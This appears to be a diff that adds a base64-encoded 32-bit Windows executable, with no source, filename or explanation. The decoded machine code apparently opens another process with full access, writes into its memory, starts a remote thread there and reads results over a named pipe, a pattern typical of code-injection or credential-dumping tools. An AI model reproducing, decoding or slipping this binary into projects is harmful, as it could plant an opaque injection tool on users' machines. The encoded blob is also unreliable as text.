+LnRleHQAAAAESAAAABAAAABQAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAEAoAAABgAAAA
+EAAAAGAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAABghAAAAcAAAABAAAABwAAAAAAAAAAAAAAAA
+AABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPsDFNVVlcz
+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
